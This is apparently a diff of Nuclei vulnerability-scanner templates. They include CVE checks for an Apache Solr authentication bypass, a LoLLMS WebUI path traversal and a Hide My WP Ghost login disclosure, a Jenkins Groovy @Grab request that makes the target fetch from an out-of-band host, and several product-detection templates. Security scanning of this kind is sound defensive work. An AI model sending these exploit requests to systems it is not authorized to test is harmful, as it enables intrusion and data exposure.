GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(%27http%3a%2f%2f{{interactsh-url}}%2f%27)%0a@Grab(%27{{vendor_name}}:{{app_name}}:1%27)%0aimport%20{{app_name}}; HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol
|
||||||
|
words:
|
||||||
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_request
|
||||||
|
words:
|
||||||
|
- "/{{replace(vendor_name, '.', '/')}}/{{app_name}}/1/{{app_name}}-1.pom"
|
||||||
|
# digest: 4b0a0048304602210085a1faf7a3de1a102f1ab5fde71db42124776cb68e66f315bdaa1a141107750b0221008549adaf38ad9247d2a2c9a8ea35e4672abe0f3ebe12c70656f9d4b465180de8:922c64590222798bb761d5b6d8e72950
|
|
@ -29,6 +29,8 @@ info:
|
||||||
shodan-query: title:"hoteldruid"
|
shodan-query: title:"hoteldruid"
|
||||||
tags: cve,cve2023,hoteldruid,sqli
|
tags: cve,cve2023,hoteldruid,sqli
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -75,4 +77,4 @@ http:
|
||||||
- 'duration>=7'
|
- 'duration>=7'
|
||||||
- 'status_code == 200'
|
- 'status_code == 200'
|
||||||
condition: and
|
condition: and
|
||||||
# digest: 490a004630440220426178e5e13df0a4daa682781ac97854701957df13929ffa4be8d50718e1bf9502203b84b0e0d9ca568e80cc134cdf687fd31a671acb7ce058711350479d847a98d1:922c64590222798bb761d5b6d8e72950
|
# digest: 490a00463044022030ef02bb52bc805a7e33565d8aa7d9f01ab2cf69c50588e3c11da240c7f0649f022005aef1f95560a51cf024af4198c11a1dee30147872075fe058d0b6ec6ea403d4:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,54 @@
|
||||||
|
id: CVE-2024-45216
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Apache Solr - Authentication Bypass
|
||||||
|
author: gumgum
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
Solr instances using the PKIAuthenticationPlugin, which is enabled by default when Solr Authentication is used, are vulnerable to Authentication bypass.A fake ending at the end of any Solr API URL path, will allow requests to skip Authentication while maintaining the API contract with the original URL Path.This fake ending looks like an unprotected API path, however it is stripped off internally after authentication but before API routing.This issue affects Apache Solr- from 5.3.0 before 8.11.4, from 9.0.0 before 9.7.0.
|
||||||
|
impact: |
|
||||||
|
Users are recommended to upgrade to version 9.7.0, or 8.11.4, which fix the issue.
|
||||||
|
reference:
|
||||||
|
- https://shfsec.com/cve-2024-45216-authentication-bypass-in-apache-solr
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-45216
|
||||||
|
- https://solr.apache.org/security html#cve-2024-45216-apache-solr-authentication-bypass-possible-using-a-fake-url-path-ending
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2024-45216
|
||||||
|
cwe-id: CWE-863,CWE-287
|
||||||
|
epss-score: 0.00043
|
||||||
|
epss-percentile: 0.09834
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
shodan-query: http.html:"Apache Solr"
|
||||||
|
tags: cve,cve2024,apache,solr,auth-bypass
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /solr/admin/info/properties:/admin/info/key HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
SolrAuth: {{to_lower(rand_text_alpha(5))}}
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "responseHeader"
|
||||||
|
- "system.properties"
|
||||||
|
- "solr.script"
|
||||||
|
- "solr.solr.home"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: content_type
|
||||||
|
words:
|
||||||
|
- 'application/json'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
# digest: 490a004630440220686c4dc5a7404e068801bbf4a05feb2a6b42c4aa0447a3c98d2260a28401c0bd02207019e32df34b848766b71256f8a8819b5b405d110e92cb54886118b69f7dcfbe:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,63 @@
|
||||||
|
id: CVE-2024-4841
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: LoLLMS WebUI - Subfolder Prediction via Path Traversal
|
||||||
|
author: s4e-io
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A Path Traversal vulnerability exists in the parisneo/lollms-webui, specifically within the 'add_reference_to_local_mode' function due to the lack of input sanitization. This vulnerability affects versions v9.6 to the latest.
|
||||||
|
impact: |
|
||||||
|
By exploiting this vulnerability, an attacker can predict the folders, subfolders, and files present on the victim's computer. The vulnerability is present in the way the application handles the 'path' parameter in HTTP requests to the '/add_reference_to_local_model' endpoint.
|
||||||
|
reference:
|
||||||
|
- https://huntr.com/bounties/740dda3e-7104-4ccf-9ac4-8870e4d6d602
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-4841
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||||
|
cvss-score: 4
|
||||||
|
cve-id: CVE-2024-4841
|
||||||
|
cwe-id: CWE-29
|
||||||
|
epss-score: 0.00043
|
||||||
|
epss-percentile: 0.09834
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
fofa-query: "LoLLMS WebUI - Welcome"
|
||||||
|
tags: cve,cve2024,lollms-webui,traversal
|
||||||
|
|
||||||
|
variables:
|
||||||
|
folder: "{{to_upper(rand_text_alpha(10))}}"
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /add_reference_to_local_model HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/json
|
||||||
|
|
||||||
|
{"path":"\\Users"}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(body, "{\"status\":true}")'
|
||||||
|
- 'contains(content_type,"application/json")'
|
||||||
|
- 'status_code == 200'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /add_reference_to_local_model HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/json
|
||||||
|
|
||||||
|
{"path":"\\{{folder}}"}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(body, "{\"status\":false,\"error\":\"Model not found\"}")'
|
||||||
|
- 'contains(content_type,"application/json")'
|
||||||
|
- 'status_code == 200'
|
||||||
|
condition: and
|
||||||
|
# digest: 4a0a0047304502204f4c2aacf87ed18aff38311690978c406fb6a1dc23e5f457678f31d955b3a280022100e3b93ae82571b2d42991d9119cae66f5053c2dd8bfa8b52b705b1bb8a3ee306b:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,62 @@
|
||||||
|
id: CVE-2024-6420
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Hide My WP Ghost < 5.2.02 - Hidden Login Page Disclosure
|
||||||
|
author: jpg0mez
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
The Hide My WP Ghost plugin does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.
|
||||||
|
remediation: Fixed in 5.2.02
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/dfda6577-81aa-4397-a2d6-1d736f9ebd44/
|
||||||
|
- https://www.sprocketsecurity.com/resources/discovering-wp-admin-urls-in-wordpress-with-gravityforms/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-6420
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
|
||||||
|
cvss-score: 8.6
|
||||||
|
cve-id: CVE-2024-6420
|
||||||
|
epss-score: 0.00043
|
||||||
|
epss-percentile: 0.09914
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 2
|
||||||
|
framework: wordpress
|
||||||
|
fofa-query: body="/wp-content/plugins/hide-my-wp"
|
||||||
|
publicwww-query: "/wp-content/plugins/hide-my-wp/"
|
||||||
|
tags: cve,cve2024,bypass,wp,wp-plugin,wpscan,wordpress,hide-my-wp
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(body, "/wp-content/plugins/hide-my-wp")'
|
||||||
|
- 'status_code == 200'
|
||||||
|
condition: and
|
||||||
|
internal: true
|
||||||
|
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/?gf_page=randomstring"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- "!contains(tolower(location), 'wp-login.php')"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- '%2F%3Fgf_page%3Drandomstring&reauth=1'
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
kval:
|
||||||
|
- location
|
||||||
|
# digest: 4b0a00483046022100a0b13d185f443723c7e88f0dd3e31617978792e99fc4c83da014daaa337f9877022100c831aab59bcd0ca39f4a7e840ac9e2bb2b416da2935d7bd4d4acafb0621946b2:922c64590222798bb761d5b6d8e72950
|
|
@ -2,7 +2,7 @@ id: CVE-2024-7928
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: FastAdmin < V1.3.4.20220530 - Path Traversal
|
name: FastAdmin < V1.3.4.20220530 - Path Traversal
|
||||||
author: s4e-io
|
author: s4e-io,Hel10-Web
|
||||||
severity: medium
|
severity: medium
|
||||||
description: |
|
description: |
|
||||||
A vulnerability, which was classified as problematic, has been found in FastAdmin up to 1.3.3.20220121. Affected by this issue is some unknown functionality of the file /index/ajax/lang. The manipulation of the argument lang leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.4.20220530 is able to address this issue. It is recommended to upgrade the affected component.
|
A vulnerability, which was classified as problematic, has been found in FastAdmin up to 1.3.3.20220121. Affected by this issue is some unknown functionality of the file /index/ajax/lang. The manipulation of the argument lang leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.4.20220530 is able to address this issue. It is recommended to upgrade the affected component.
|
||||||
|
@ -48,4 +48,4 @@ http:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
# digest: 4a0a0047304502206a03af2bd622586d9ea3423ce05fb8c99fe1ec1940335aca969aece8642d4cf9022100e4fa51cfa54ae2d026551a9ff270d3e4c5e52c4645e364558c90b77f36d71458:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a004730450220385c532d368b3808a915a79463997ddb6ff8018a20199b4998af4174f576745c022100f711195a605eb802382565dc482c781c169d00258730209652591d41dee479ec:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,36 @@
|
||||||
|
id: cyberpanel-panel
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Cyberpanel Login Panel - Detect
|
||||||
|
author: mailler
|
||||||
|
severity: info
|
||||||
|
description: |
|
||||||
|
Cyberpanel login panel was detected.
|
||||||
|
reference:
|
||||||
|
- https://cyberpanel.net/KnowledgeBase/
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cwe-id: CWE-200
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
shodan-query: html:"cyberpanel"
|
||||||
|
fofa-query: app="Cyberpanel"
|
||||||
|
product: cyberpanel
|
||||||
|
tags: cyberpanel,panel,login,detect
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- "<title>(.*)CyberPanel(.*)</title>"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
# digest: 4a0a004730450221008907aa96c27405c826857b7ef745657707e1e19fbd3ba3dd43a39f946de135a202207caab45a1862b88cf7a747d3dfd54d12af83fe04ab50dac000e131e30c833372:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,28 @@
|
||||||
|
id: quivr-panel
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Quivr Panel - Detect
|
||||||
|
author: s4e-io
|
||||||
|
severity: info
|
||||||
|
description: |
|
||||||
|
Quivr panel was discovered.
|
||||||
|
reference:
|
||||||
|
- https://github.com/QuivrHQ/quivr
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
fofa-query: icon_hash="848114197"
|
||||||
|
tags: panel,login,quivr,detect
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/login"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains_any(body, "<title>Quivr - Get a Second Brain", "data-sentry-component=\"QuivrLogo\"")'
|
||||||
|
- 'status_code == 200'
|
||||||
|
condition: and
|
||||||
|
# digest: 4a0a0047304502202e8eac84bfdc975779f3da9230f56f83b71d7b759680e7980c8f2e9a92f7f9bf02210094cb04c2138934c3c51cefe1ee16376b4de75eb73ed1e4f568df35f99abd334c:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: ip-webcam
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: IP Webcam Viewer Page - Detect
|
||||||
|
author: gy741
|
||||||
|
severity: low
|
||||||
|
description: |
|
||||||
|
Searches for exposed webcams by querying the endpoint and the existence of IP Webcam in the body.
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
shodan-query: http.favicon.hash:-601917817
|
||||||
|
tags: webcam,iot,detect
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '<title>IP Webcam</title>'
|
||||||
|
- 'Pavel Khlebovich'
|
||||||
|
condition: and
|
||||||
|
# digest: 4b0a00483046022100e5996146b860677c6e4521de9ad42095cecdbd62519c9ea877440a065092d859022100eb1341d93797ad203e767e9b2730b75eeda5e8d7fb83382c7e726710036c043e:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: azure-blob-core-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Azure Blob Core Service - Detect
|
||||||
|
author: ProjectDiscoveryAI
|
||||||
|
severity: info
|
||||||
|
description: |
|
||||||
|
This template detects the presence of 'blob.core.windows.net' in the response body, indicating potential references to Azure Blob Storage.
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
shodan-query: html:"blob.core.windows.net"
|
||||||
|
tags: azur,blob,detect
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: response
|
||||||
|
words:
|
||||||
|
- "blob.core.windows.net"
|
||||||
|
# digest: 4a0a00473045022006936d241ffe12fbdc24fb7b8a5ddf0350b5d89186e9652c2b1349cf5bef957c0221008ab50b8b01f5974e0f7f67f5730e16f0df2ffd135509bd3de13a366cbaa904d6:922c64590222798bb761d5b6d8e72950
|
|
@ -2,11 +2,16 @@ id: thanos-prometheus-exposure
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Thanos Prometheus Setup - Exposure
|
name: Thanos Prometheus Setup - Exposure
|
||||||
author: DhiyaneshDk
|
author: DhiyaneshDk,righettod
|
||||||
severity: high
|
severity: high
|
||||||
|
description: |
|
||||||
|
Thanos graph endpoint was detected.
|
||||||
|
reference:
|
||||||
|
- https://thanos.io/
|
||||||
|
- https://github.com/thanos-io/thanos
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
max-request: 1
|
max-request: 2
|
||||||
shodan-query: title:"Thanos | Highly available Prometheus setup"
|
shodan-query: title:"Thanos | Highly available Prometheus setup"
|
||||||
fofa-query: icon_hash="29632872"
|
fofa-query: icon_hash="29632872"
|
||||||
tags: thanos,prometheus,exposure,setup,misconfig
|
tags: thanos,prometheus,exposure,setup,misconfig
|
||||||
|
@ -15,17 +20,13 @@ http:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/graph"
|
- "{{BaseURL}}/graph"
|
||||||
|
- "{{BaseURL}}/classic/graph"
|
||||||
|
|
||||||
matchers-condition: and
|
stop-at-first-match: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: dsl
|
||||||
words:
|
dsl:
|
||||||
- "THANOS_COMPONENT"
|
- 'status_code == 200'
|
||||||
- "THANOS_QUERY_URL"
|
- 'contains_all(body, "THANOS_COMPONENT", "THANOS_QUERY_URL") || contains_all(body, "<title>Thanos", "href=\"/classic/\">Thanos</a>")'
|
||||||
condition: and
|
condition: and
|
||||||
|
# digest: 4b0a00483046022100f8f26aad83b4b0162f73962102847bd51cda6dcb0cb3385b26ce3b0e716cadea022100c63e4a1a2e541904ddd90bff7e095310d93972002ff7952f62c8acc6fd615eb6:922c64590222798bb761d5b6d8e72950
|
||||||
part: body
|
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
# digest: 4a0a00473045022100d9e1e7479593315b55f53fd69afbc820f042cce7a4a60701e873063a1ff59ac0022000ce3370054049d410c3c2e5bf66ae61582e6d5e1255ab4808a62e399d219a3e:922c64590222798bb761d5b6d8e72950
|
|
|
@ -3781,8 +3781,13 @@ http:
|
||||||
dsl:
|
dsl:
|
||||||
- "status_code==200 && (\"1857752096\" == mmh3(base64_py(body)))"
|
- "status_code==200 && (\"1857752096\" == mmh3(base64_py(body)))"
|
||||||
|
|
||||||
|
- type: dsl
|
||||||
|
name: "ip-webcam"
|
||||||
|
dsl:
|
||||||
|
- "status_code==200 && (\"-601917817\" == mmh3(base64_py(body)))"
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
- 'mmh3(base64_py(body))'
|
- 'mmh3(base64_py(body))'
|
||||||
# digest: 4a0a0047304502200908529273d4bbc48bd1193bca5e97038f56bb88a937f8f0ba9fccba5fa06a78022100b2265e15f2fd199166d137855ffe2835957bebc158eb8007eb322d77fca12b2f:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022063790a3b80cf985f1f3386b1b5f5fe412c9f29729f1d2ea319d238f0185084a9022100900b177b1c451c6b0e0383767e9e0f7bf6057f53615495cdb0bb439a342215fe:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: hubble-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Hubble - Detect
|
||||||
|
author: righettod
|
||||||
|
severity: info
|
||||||
|
description: |
|
||||||
|
Hubble products was detected.
|
||||||
|
reference:
|
||||||
|
- https://github.com/cilium/hubble
|
||||||
|
- https://docs.cilium.io/en/stable/observability/hubble/
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
shodan-query: http.title:"Hubble UI"
|
||||||
|
tags: tech,hubble,detect
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
host-redirects: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains_any(to_lower(body), "<title>hubble ui enterprise", "<title>hubble ui")'
|
||||||
|
condition: and
|
||||||
|
# digest: 4a0a00473045022100e506c503ed78af724c35c6b799995acf62a494a03a57211004bfc0b4890ce5c502206dbc547ac892aba8055fc5215264ebaa67c08309ab3ba20f3a1c7684691d1d6c:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,33 @@
|
||||||
|
id: localai-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: LocalAI - Detect
|
||||||
|
author: s4e-io
|
||||||
|
severity: info
|
||||||
|
description: |
|
||||||
|
An instance running LocalAI was detected.
|
||||||
|
reference:
|
||||||
|
- https://github.com/mudler/LocalAI
|
||||||
|
- https://localai.io/
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
vendor: mudler
|
||||||
|
product: localai
|
||||||
|
fofa-query: "LocalAI API"
|
||||||
|
shodan-query: http.favicon.hash:-976853304
|
||||||
|
tags: localai,tech,detect
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
host-redirects: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains_all(body, "alt=\"LocalAI Logo\"", "<title>LocalAI")'
|
||||||
|
- 'status_code == 200'
|
||||||
|
condition: and
|
||||||
|
# digest: 4a0a004730450221009a2d4b221f08c88e0eb9320a33e2be06efb24d9f4764e7fbea6d508bb1d801ca02206f43d083b6202fe6e065c01f47cb46854ed27a37488b44a11c52fa830bf4e74a:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,29 @@
|
||||||
|
id: pghero-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: PgHero - Detect
|
||||||
|
author: righettod
|
||||||
|
severity: info
|
||||||
|
description: |
|
||||||
|
PgHero products was detected.
|
||||||
|
reference:
|
||||||
|
- https://github.com/ankane/pghero
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
shodan-query: http.title:"PgHero"
|
||||||
|
tags: tech,pghero,detect
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
host-redirects: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains_any(to_lower(body), "<title>pghero", "/assets/pghero/", ">pghero</a>")'
|
||||||
|
condition: and
|
||||||
|
# digest: 4a0a00473045022009d92fd71a4e9a2aed02cffdcf3080aba8948f91890f4704c8a66b72e9dec584022100d5823d5325286af0d924fb1d3458589290a966e434c16769a71d3f2ed461335b:922c64590222798bb761d5b6d8e72950
|
|
@ -46,3 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
|
# digest: 490a0046304402207e579d3bf146793986ce1a614b2845dad63213aa61909dda263a8c9f374568d4022076a1d66940381d23f9923f2eee8c5fd9d184d2e87e0c31ce63de9490d236918e:922c64590222798bb761d5b6d8e72950
|
|
@ -46,3 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
|
# digest: 490a00463044022078bb2cde6119145568ed297ad482ae6a5119ab1ee6795971a51a193fb88ec0150220720d120f63bfd04954da0d88598d2daba540fa929e6b06e423b200ca63493d2a:922c64590222798bb761d5b6d8e72950
|
|
@ -46,3 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
|
# digest: 490a0046304402203d9bded756c85bbbae99c5be599829af055119a9afe898b13c47d7c5825d686302203428bdc0646af8cf1d6fcc589c2de151671e9cac58deb71df0ccc6ca64d28ecf:922c64590222798bb761d5b6d8e72950
|
|
@ -46,3 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
|
# digest: 490a0046304402202909d4be5ca55edb70e88e873cd453842402d7d0729b1223b47dcbdfc33ddd650220354d5616e0cf381f2aebab1ec36725a3938d1137c6b388021b1b2b7e8fe79c2a:922c64590222798bb761d5b6d8e72950
|
|
@ -46,3 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
|
# digest: 4a0a0047304502203fba70148a94e55a6dc8a3d9382c0ece460d5f9f41cd88d5087422fe7218369a022100a05e77073200ed90b3f89f74e49572f531c0a8ffc8ad61e68de122c518af961e:922c64590222798bb761d5b6d8e72950
|
|
@ -46,3 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
|
# digest: 490a004630440220442c4706420276ce4cb5d7cd067f83ade184e69d8c0d2036a4aa3bb0b14182eb02203f94e2dca686dd1a7f0d3f900b0b80b5c277a75a52f2506ef59689eadd61202d:922c64590222798bb761d5b6d8e72950
|
|
@ -46,3 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
|
# digest: 4b0a00483046022100be5c6983d5e4eb980d86eef9ac7be6e90fcdb921ce8c2d27fb7f484bd327229e022100ac59b2fd2d6eb23f739b7408e351baff980a4fb79c1f37b31bb079980ba6ede7:922c64590222798bb761d5b6d8e72950
|
|
@ -46,3 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
|
# digest: 4a0a004730450220758487600b9878a9044fd75fcf9eaafd4e26a4b9e452a444be1712eb24253a5d022100a7565f5a66ca12d436a4ee9c376957e033f7dd74d1fc83d9d1a495e304464781:922c64590222798bb761d5b6d8e72950
|
|
@ -46,3 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
|
# digest: 4b0a00483046022100be0d25935ae24a5c8e9670f40672cd0324f9cf0d0f792e6be855363fcaf80121022100b8e1c6a095a0f5fec3b3b5c564b9962a0947c531af52b3e5ae094b1173a0b753:922c64590222798bb761d5b6d8e72950
|
|
@ -46,3 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
|
# digest: 4a0a00473045022100d9d941b18d4f66d4537a0a0436d5e24c1595845d11a60cb5eee99bf70f4dda3402200eee1405b055c7759177fce468292d13e42014ff969b694c9a7b7b67774e36a1:922c64590222798bb761d5b6d8e72950
|
|
@ -46,3 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
|
# digest: 4b0a00483046022100d792d64868e7467d4099791651a5b96d10df91ff7e187f26abba2812414f6eff0221008dbe9548053a29094b019156d02c3978788869917eaf4b2dd97cfaf22651d919:922c64590222798bb761d5b6d8e72950
|
|
@ -46,3 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
|
# digest: 490a00463044022030019080f257199760c959f228a578b0db01744dc6608d04cb921766df3c8655022078269944440481eda5083f6c5b33b65becc4e93ae47793ad96584419a003028f:922c64590222798bb761d5b6d8e72950
|
|
@ -46,3 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
